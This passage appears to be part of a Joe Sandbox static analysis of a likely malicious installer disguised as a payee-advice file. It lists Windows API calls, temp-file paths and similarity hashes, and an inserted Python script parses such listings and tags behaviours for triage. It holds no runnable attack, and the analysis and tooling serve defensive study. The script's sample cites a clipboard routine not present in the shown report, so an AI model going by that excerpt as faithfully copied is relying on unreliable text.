  • Part of subcall function 004056AA: GetDlgItemTextW.USER32(?,?,00000400,00404786), ref: 004056BD
  • Part of subcall function 0040617E: CharNextW.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403332,C:\Users\user\AppData\Local\Temp\,75923420,00403512), ref: 004061E1
  • Part of subcall function 0040617E: CharNextW.USER32(?,?,?,00000000), ref: 004061F0
  • Part of subcall function 0040617E: CharNextW.USER32(?,"C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403332,C:\Users\user\AppData\Local\Temp\,75923420,00403512), ref: 004061F5
  • Part of subcall function 0040617E: CharPrevW.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403332,C:\Users\user\AppData\Local\Temp\,75923420,00403512), ref: 00406208
• GetDiskFreeSpaceW.KERNEL32(004206A0,?,?,0000040F,?,004206A0,004206A0,?,00000000,004206A0,?,?,000003FB,?), ref: 00404810
• MulDiv.KERNEL32(?,0000040F,00000400), ref: 0040482B
• SetDlgItemTextW.USER32(00000000,00000400,00420690), ref: 004048B1
Strings
Memory Dump Source
• Source File: 00000000.00000002.2664622803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2664573128.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2664665698.0000000000407000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2664772475.0000000000409000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2664772475.0000000000426000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2664772475.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2664772475.000000000044F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2664772475.0000000000451000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2665086131.0000000000453000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_PayeeAdvice_HK54912_R0038704_37504.jbxd
Similarity
• API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpi
• String ID: A$C:\Users\user\AppData\Local\foreslaaende$Call
• API String ID: 2246997448-3579533417
• Opcode ID: 5e1be59e26550fe03483dde9140ef9c7df16d0723f1807c21cae017824fc49c2
• Instruction ID: fc6e5784adbf23f3bf0ca4204261aafad130db7b69f5cfc08d06a9dfd3cb4e02
• Opcode Fuzzy Hash: 5e1be59e26550fe03483dde9140ef9c7df16d0723f1807c21cae017824fc49c2
• Instruction Fuzzy Hash: 1B916FB2900209ABDB11AFA1CC85AAF77B8EF85354F10847BF701B72D1D77C99418B69
APIs
• CoCreateInstance.OLE32(00407474,?,00000001,00407464,?,00000000,00000045,000000CD,00000002,000000DF,000000F0), ref: 004020BD
Strings
• C:\Users\user\AppData\Local\foreslaaende, xrefs: 004020FB
Memory Dump Source
• Source File: 00000000.00000002.2664622803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2664573128.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2664665698.0000000000407000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2664772475.0000000000409000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2664772475.0000000000426000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2664772475.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2664772475.000000000044F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2664772475.0000000000451000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2665086131.0000000000453000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_PayeeAdvice_HK54912_R0038704_37504.jbxd
Similarity
• API ID: CreateInstance
• String ID: C:\Users\user\AppData\Local\foreslaaende
• API String ID: 542301482-1954961325
• Opcode ID: a0bb92f52aa57a686fb7670324366c30062890f5d7bc8498ec9199db5fdfdb62
• Instruction ID: b9114a0b4d3c9f05545c6126c0c632b8b73b1fcf7d0bd01aa9b6132af3d7cd36
• Opcode Fuzzy Hash: a0bb92f52aa57a686fb7670324366c30062890f5d7bc8498ec9199db5fdfdb62
• Instruction Fuzzy Hash: 4B414F75A00105BFCB00DFA4C988EAE7BB5AF49318B20416AF505EF2D1D679AD41CB55
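The per-function listings in this report are easier to triage once they are parsed into records. The script below is an added example, not part of this Joe Sandbox report or of Joe Sandbox's own tooling: it splits the report text at each "APIs" header, collects the call lines (including "Part of subcall" lines), the "Strings" entries, the memory-dump source file and the Similarity hashes into one record per function, replaces the raw hex arguments the report prints with standard Win32 constant names where those are unambiguous (list-view and progress-bar messages, the clipboard format, GlobalAlloc flags), and attaches simple behaviour tags. The sample input is a trimmed excerpt copied from the clipboard function and the CoCreateInstance function listed above; the behaviour tags, the MSG_NAMES table and the regular expressions are this example's own choices and only cover the line shapes that appear on this page.

```python
"""Turn Joe Sandbox function-analysis listings into queryable records (added example)."""
import re
from dataclasses import dataclass, field

# One call line:  • SetClipboardData.USER32(0000000D,00000000), ref: 00405652
# Calls without arguments are printed without parentheses, e.g. "EmptyClipboard.USER32 ref: ..."
API_RE = re.compile(r"^•\s*(\w+)\.(\w+)(?:\((.*?)\))?\s*,?\s*ref:\s*([0-9A-Fa-f]+)$")
STRING_RE = re.compile(r"^•\s*(.+), xrefs: ([0-9A-Fa-f]+)$")
SUBCALL = "Part of subcall function "

# Standard Win32 values for arguments the report shows as raw hex (assumed by this example).
MSG_NAMES = {
    0x0401: "PBM_SETRANGE", 0x0409: "PBM_SETBARCOLOR", 0x2001: "CCM_SETBKCOLOR",
    0x1001: "LVM_SETBKCOLOR", 0x1004: "LVM_GETITEMCOUNT", 0x1024: "LVM_SETTEXTCOLOR",
    0x1026: "LVM_SETTEXTBKCOLOR", 0x1036: "LVM_SETEXTENDEDLISTVIEWSTYLE",
    0x1061: "LVM_INSERTCOLUMNW", 0x1073: "LVM_GETITEMTEXTW",
}
GMEM_FLAGS = ((0x0002, "GMEM_MOVEABLE"), (0x0040, "GMEM_ZEROINIT"))
CF_NAMES = {0x1: "CF_TEXT", 0xD: "CF_UNICODETEXT"}

# Heuristic labels (this example's own): a function gets a tag when its own,
# non-subcall API set contains every API the tag requires.
BEHAVIOURS = {
    "clipboard_write": {"OpenClipboard", "EmptyClipboard", "SetClipboardData", "CloseClipboard"},
    "thread_create": {"CreateThread"},
    "com_instance": {"CoCreateInstance"},
    "file_enum": {"FindFirstFileW"},
}

@dataclass
class Call:
    api: str
    module: str
    args: tuple
    ref: int
    subcall: bool = False

@dataclass
class Function:
    calls: list = field(default_factory=list)
    strings: list = field(default_factory=list)
    source: str = ""
    opcode_id: str = ""
    instr_hash: str = ""

def parse_listing(text):
    """Collect one Function per 'APIs' block; lines before the first header are ignored."""
    funcs, cur = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if line == "APIs":
            cur = Function()
            funcs.append(cur)
            continue
        if cur is None:
            continue
        sub = line.startswith("•") and SUBCALL in line
        if sub:  # reshape "• Part of subcall function X: API.MOD(...), ref: Y" into a plain call line
            line = "• " + line.split(": ", 1)[1]
        if (m := API_RE.match(line)):
            api, mod, args, ref = m.groups()
            cur.calls.append(Call(api, mod, tuple(args.split(",")) if args else (), int(ref, 16), sub))
        elif (m := STRING_RE.match(line)):
            cur.strings.append(m.group(1))
        elif line.startswith("• Source File: "):
            cur.source = line[len("• Source File: "):].split(",")[0]
        elif line.startswith("• Opcode ID: "):
            cur.opcode_id = line.split(": ", 1)[1]
        elif line.startswith("• Instruction Fuzzy Hash: "):
            cur.instr_hash = line.split(": ", 1)[1]
    return funcs

def _hex(s):
    try:
        return int(s, 16)
    except ValueError:  # "?" means the analyser could not recover the value statically
        return None

def decode_call(c):
    """Render a call with well-known constants replaced by their symbolic names."""
    args = list(c.args)
    if c.api == "SendMessageW" and len(args) > 1 and _hex(args[1]) in MSG_NAMES:
        args[1] = MSG_NAMES[_hex(args[1])]
    elif c.api == "SetClipboardData" and args and _hex(args[0]) in CF_NAMES:
        args[0] = CF_NAMES[_hex(args[0])]
    elif c.api == "GlobalAlloc" and args and _hex(args[0]) is not None:
        names = [n for bit, n in GMEM_FLAGS if _hex(args[0]) & bit]
        args[0] = "|".join(names) or "GMEM_FIXED"
    return f"{c.api}({', '.join(args)})"

def behaviour_tags(fn):
    apis = {c.api for c in fn.calls if not c.subcall}
    return sorted(tag for tag, need in BEHAVIOURS.items() if need <= apis)

# Trimmed excerpt of two function blocks from this report (copied, not constructed).
SAMPLE = r"""
APIs
• SendMessageW.USER32(?,00001073,00000000,?), ref: 004055E7
• OpenClipboard.USER32(00000000), ref: 004055F7
• EmptyClipboard.USER32 ref: 004055FD
• GlobalAlloc.KERNEL32(00000042,00000000), ref: 00405609
• GlobalLock.KERNEL32(00000000), ref: 00405613
• SendMessageW.USER32(?,00001073,00000000,?), ref: 00405627
• GlobalUnlock.KERNEL32(00000000), ref: 00405647
• SetClipboardData.USER32(0000000D,00000000), ref: 00405652
• CloseClipboard.USER32 ref: 00405658
  • Part of subcall function 00404164: SendMessageW.USER32(00000028,?,00000001,00403F90), ref: 00404172
Memory Dump Source
• Source File: 00000000.00000002.2664622803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Similarity
• Opcode ID: 0c7871d9c118b0e9bc82f4af322ee916726f515fd3ec4b55100c1069ec2247ae
• Instruction Fuzzy Hash: 4AB16B70900209BFDF219F60DD89AAE7B79FB04315F50803AFA05BA1A0C7759E52DF69
APIs
• CoCreateInstance.OLE32(00407474,?,00000001,00407464,?,00000000,00000045,000000CD,00000002,000000DF,000000F0), ref: 004020BD
Strings
• C:\Users\user\AppData\Local\foreslaaende, xrefs: 004020FB
"""

if __name__ == "__main__":
    for fn in parse_listing(SAMPLE):
        print(f"function near {fn.calls[0].ref:#010x}  tags={behaviour_tags(fn)}  hash={fn.instr_hash[:16]}")
        for c in fn.calls:
            print("   ", ("subcall " if c.subcall else "") + decode_call(c))
        for s in fn.strings:
            print("    string:", s)
```

Pasting a larger portion of the report into SAMPLE (or reading it from a file) gives one record per function, so the first-seen clipboard sequence, the thread creation, and the string referenced by the CoCreateInstance function can be queried by tag or by Opcode ID rather than by scrolling; the Instruction Fuzzy Hash field is kept verbatim so records can be matched against the same field from other reports.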
APIs
• FindFirstFileW.KERNEL32(00000000,?,00000002), ref: 0040277F
Memory Dump Source
• Source File: 00000000.00000002.2664622803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2664573128.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2664665698.0000000000407000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2664772475.0000000000409000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2664772475.0000000000426000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2664772475.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2664772475.000000000044F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2664772475.0000000000451000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2665086131.0000000000453000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_PayeeAdvice_HK54912_R0038704_37504.jbxd
Similarity
• API ID: FileFindFirst
• String ID:
• API String ID: 1974802433-0
• Opcode ID: d555c6e09dbf6ad66d53053e92e2a3446f724d402b29968be0a2f1aefd2bf89d
• Instruction ID: c3eebe46d33317c4d9c4db9deeb30b83dd141210d4acf70d00b973005abdca29
• Opcode Fuzzy Hash: d555c6e09dbf6ad66d53053e92e2a3446f724d402b29968be0a2f1aefd2bf89d
• Instruction Fuzzy Hash: 81F05EB1614114DBDB00DBA4DD499AEB378FF14318F20097AE141F31D0D6B45940DB2A
                                                                                                                                          APIs
                                                                                                                                          • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 0040436A
                                                                                                                                          • GetDlgItem.USER32(?,000003E8), ref: 0040437E
                                                                                                                                          • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 0040439B
                                                                                                                                          • GetSysColor.USER32(?), ref: 004043AC
                                                                                                                                          • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 004043BA
                                                                                                                                          • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 004043C8
                                                                                                                                          • lstrlenW.KERNEL32(?), ref: 004043CD
                                                                                                                                          • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 004043DA
                                                                                                                                          • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 004043EF
                                                                                                                                          • GetDlgItem.USER32(?,0000040A), ref: 00404448
                                                                                                                                          • SendMessageW.USER32(00000000), ref: 0040444F
                                                                                                                                          • GetDlgItem.USER32(?,000003E8), ref: 0040447A
                                                                                                                                          • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 004044BD
                                                                                                                                          • LoadCursorW.USER32(00000000,00007F02), ref: 004044CB
                                                                                                                                          • SetCursor.USER32(00000000), ref: 004044CE
                                                                                                                                          • ShellExecuteW.SHELL32(0000070B,open,00427180,00000000,00000000,00000001), ref: 004044E3
                                                                                                                                          • LoadCursorW.USER32(00000000,00007F00), ref: 004044EF
                                                                                                                                          • SetCursor.USER32(00000000), ref: 004044F2
                                                                                                                                          • SendMessageW.USER32(00000111,00000001,00000000), ref: 00404521
                                                                                                                                          • SendMessageW.USER32(00000010,00000000,00000000), ref: 00404533
                                                                                                                                          Strings
Memory Dump Source
• Source File: 00000000.00000002.2664622803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2664573128.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2664665698.0000000000407000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2664772475.0000000000409000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2664772475.0000000000426000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2664772475.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2664772475.000000000044F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2664772475.0000000000451000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2665086131.0000000000453000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_PayeeAdvice_HK54912_R0038704_37504.jbxd
Similarity
• API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorExecuteShelllstrlen
• String ID: CB@$Call$N$open
• API String ID: 3615053054-4184941720
• Opcode ID: 2203d86e9aedfb02f953f7f44e7e92c7d68489696ba88c708ebc1c14ae09885d
• Instruction ID: ed67d3ceb40554f4a20f9fe4cecdec295417cbe43b6f72f0b7bb3cee00e3d4b7
• Opcode Fuzzy Hash: 2203d86e9aedfb02f953f7f44e7e92c7d68489696ba88c708ebc1c14ae09885d
• Instruction Fuzzy Hash: 037173B1A00209BFDB109F64DD45A6A7B69FB84315F00813AF705BA2D0C778AD51DF99
APIs
• lstrcpyW.KERNEL32(00425D70,NUL,?,00000000,?,?,?,00405DAC,?,?,00000001,00405924,?,00000000,000000F1,?), ref: 00405C18
• CloseHandle.KERNEL32(00000000,00000000,00000000,00000001,?,?,?,00405DAC,?,?,00000001,00405924,?,00000000,000000F1,?), ref: 00405C3C
• GetShortPathNameW.KERNEL32(00000000,00425D70,00000400), ref: 00405C45
  • Part of subcall function 00405ABB: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405CF5,00000000,[Rename],00000000,00000000,00000000), ref: 00405ACB
  • Part of subcall function 00405ABB: lstrlenA.KERNEL32(00405CF5,?,00000000,00405CF5,00000000,[Rename],00000000,00000000,00000000), ref: 00405AFD
• GetShortPathNameW.KERNEL32(?,00426570,00000400), ref: 00405C62
• wsprintfA.USER32 ref: 00405C80
• GetFileSize.KERNEL32(00000000,00000000,00426570,C0000000,00000004,00426570,?,?,?,?,?), ref: 00405CBB
• GlobalAlloc.KERNEL32(00000040,0000000A), ref: 00405CCA
• lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000), ref: 00405D02
• SetFilePointer.KERNEL32(?,00000000,00000000,00000000,00000000,00425970,00000000,-0000000A,00409544,00000000,[Rename],00000000,00000000,00000000), ref: 00405D58
• WriteFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 00405D6A
• GlobalFree.KERNEL32(00000000), ref: 00405D71
• CloseHandle.KERNEL32(00000000), ref: 00405D78
  • Part of subcall function 00405B56: GetFileAttributesW.KERNELBASE(00000003,00402DFF,C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe,80000000,00000003), ref: 00405B5A
  • Part of subcall function 00405B56: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405B7C
Strings
Memory Dump Source
• Source File: 00000000.00000002.2664622803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2664573128.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2664665698.0000000000407000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2664772475.0000000000409000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2664772475.0000000000426000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2664772475.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2664772475.000000000044F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2664772475.0000000000451000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2665086131.0000000000453000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_PayeeAdvice_HK54912_R0038704_37504.jbxd
Similarity
• API ID: File$CloseGlobalHandleNamePathShortlstrcpylstrlen$AllocAttributesCreateFreePointerSizeWritewsprintf
• String ID: %ls=%ls$NUL$[Rename]$p]B$peB
• API String ID: 1265525490-3322868524
• Opcode ID: 3c7f54d89e258796605fea9f6ef32f5c4e34e08a6eb3a6df642de3325c5bcbec
• Instruction ID: dd28b8746f6bac9015e409c36d2f5baf321d2fce784c03eddf9b1c2e257c4ca8
• Opcode Fuzzy Hash: 3c7f54d89e258796605fea9f6ef32f5c4e34e08a6eb3a6df642de3325c5bcbec
• Instruction Fuzzy Hash: 9741E271604B19BBD2216B715C4DF6B3B6CEF41754F14453BBA01B62D2EA3CA8018EBD
APIs
• DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
• BeginPaint.USER32(?,?), ref: 00401047
• GetClientRect.USER32(?,?), ref: 0040105B
• CreateBrushIndirect.GDI32(00000000), ref: 004010CF
• FillRect.USER32(00000000,?,00000000), ref: 004010E4
• DeleteObject.GDI32(?), ref: 004010ED
• CreateFontIndirectW.GDI32(?), ref: 00401105
• SetBkMode.GDI32(00000000,00000001), ref: 00401126
• SetTextColor.GDI32(00000000,000000FF), ref: 00401130
• SelectObject.GDI32(00000000,?), ref: 00401140
• DrawTextW.USER32(00000000,004281E0,000000FF,00000010,00000820), ref: 00401156
• SelectObject.GDI32(00000000,00000000), ref: 00401160
• DeleteObject.GDI32(?), ref: 00401165
• EndPaint.USER32(?,?), ref: 0040116E
Strings
Memory Dump Source
• Source File: 00000000.00000002.2664622803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2664573128.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2664665698.0000000000407000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2664772475.0000000000409000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2664772475.0000000000426000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2664772475.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2664772475.000000000044F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2664772475.0000000000451000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2665086131.0000000000453000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_PayeeAdvice_HK54912_R0038704_37504.jbxd
Similarity
• API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
• String ID: F
• API String ID: 941294808-1304234792
• Opcode ID: 0e57b95dfdd8f299c9740ed801e1ea7310e3bc8a8783e459bd01da44e8a50aec
• Instruction ID: 126a239e0572de30fb8c34ac70cebce50066b6690b2383a097db7944ba687981
• Opcode Fuzzy Hash: 0e57b95dfdd8f299c9740ed801e1ea7310e3bc8a8783e459bd01da44e8a50aec
• Instruction Fuzzy Hash: DA419A71804249AFCB058FA5DD459BFBFB9FF48310F00802AF951AA1A0C738EA51DFA5
APIs
• CharNextW.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403332,C:\Users\user\AppData\Local\Temp\,75923420,00403512), ref: 004061E1
• CharNextW.USER32(?,?,?,00000000), ref: 004061F0
• CharNextW.USER32(?,"C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403332,C:\Users\user\AppData\Local\Temp\,75923420,00403512), ref: 004061F5
• CharPrevW.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403332,C:\Users\user\AppData\Local\Temp\,75923420,00403512), ref: 00406208
Strings
• "C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe", xrefs: 004061C2
• *?|<>/":, xrefs: 004061D0
• C:\Users\user\AppData\Local\Temp\, xrefs: 0040617F, 00406184
Memory Dump Source
• Source File: 00000000.00000002.2664622803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2664573128.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2664665698.0000000000407000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2664772475.0000000000409000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2664772475.0000000000426000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2664772475.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2664772475.000000000044F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2664772475.0000000000451000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2665086131.0000000000453000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_PayeeAdvice_HK54912_R0038704_37504.jbxd
Similarity
• API ID: Char$Next$Prev
• String ID: "C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
• API String ID: 589700163-614586876
• Opcode ID: bf19904cbb26e83114afcd58bf256c97857e1bb2abc1c9c3e805ea3815cda1ed
• Instruction ID: e0619f79a043cffb4c3b00824a243f33de9385cd0f0c41224b0956f888f04927
• Opcode Fuzzy Hash: bf19904cbb26e83114afcd58bf256c97857e1bb2abc1c9c3e805ea3815cda1ed
• Instruction Fuzzy Hash: 3511C47680021295EB307B548C40BB762F8EF957A0F56403FE996B72C2E77C5C9282BD
APIs
• WideCharToMultiByte.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\nsh2473.tmp,000000FF,C:\Users\user\AppData\Local\Temp\nsh2473.tmp\System.dll,00000400,?,?,00000021), ref: 0040252F
• lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsh2473.tmp\System.dll,?,?,C:\Users\user\AppData\Local\Temp\nsh2473.tmp,000000FF,C:\Users\user\AppData\Local\Temp\nsh2473.tmp\System.dll,00000400,?,?,00000021), ref: 00402536
                                                                                                                                          • WriteFile.KERNEL32(00000000,?,C:\Users\user\AppData\Local\Temp\nsh2473.tmp\System.dll,00000000,?,?,00000000,00000011), ref: 00402568
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.2664622803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                          • Associated: 00000000.00000002.2664573128.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2664665698.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2664772475.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2664772475.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2664772475.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2664772475.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2664772475.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2665086131.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_PayeeAdvice_HK54912_R0038704_37504.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: ByteCharFileMultiWideWritelstrlen
                                                                                                                                          • String ID: 8$C:\Users\user\AppData\Local\Temp\nsh2473.tmp$C:\Users\user\AppData\Local\Temp\nsh2473.tmp\System.dll
                                                                                                                                          • API String ID: 1453599865-3664944449
                                                                                                                                          • Opcode ID: ba053f0344776bd3916354cbd0a68f7896d065c86eb027949be49280e87f23d6
                                                                                                                                          • Instruction ID: b6741c74acf97665735c623be1ff62c12e58b25bca11cb73faf7774dd427f28f
                                                                                                                                          • Opcode Fuzzy Hash: ba053f0344776bd3916354cbd0a68f7896d065c86eb027949be49280e87f23d6
                                                                                                                                          • Instruction Fuzzy Hash: A5019671A44204FBD700AFA0DE49EAF7278AB50319F20053BF102B61D2D7BC5D41DA2D
                                                                                                                                          APIs
                                                                                                                                          • GetWindowLongW.USER32(?,000000EB), ref: 004041B3
                                                                                                                                          • GetSysColor.USER32(00000000), ref: 004041CF
                                                                                                                                          • SetTextColor.GDI32(?,00000000), ref: 004041DB
                                                                                                                                          • SetBkMode.GDI32(?,?), ref: 004041E7
                                                                                                                                          • GetSysColor.USER32(?), ref: 004041FA
                                                                                                                                          • SetBkColor.GDI32(?,?), ref: 0040420A
                                                                                                                                          • DeleteObject.GDI32(?), ref: 00404224
                                                                                                                                          • CreateBrushIndirect.GDI32(?), ref: 0040422E
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.2664622803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                          • Associated: 00000000.00000002.2664573128.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2664665698.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2664772475.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2664772475.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2664772475.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2664772475.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2664772475.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2665086131.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_PayeeAdvice_HK54912_R0038704_37504.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 2320649405-0
                                                                                                                                          • Opcode ID: b90be86f4b41523f1c687d93ae3cdfe665fb5c0f546787b0b5a2f8f889851cd4
                                                                                                                                          • Instruction ID: 80eb99ce468fafd782bf4c41e5e54efb1aa93a8fb2f83beca87368335cd0d861
                                                                                                                                          • Opcode Fuzzy Hash: b90be86f4b41523f1c687d93ae3cdfe665fb5c0f546787b0b5a2f8f889851cd4
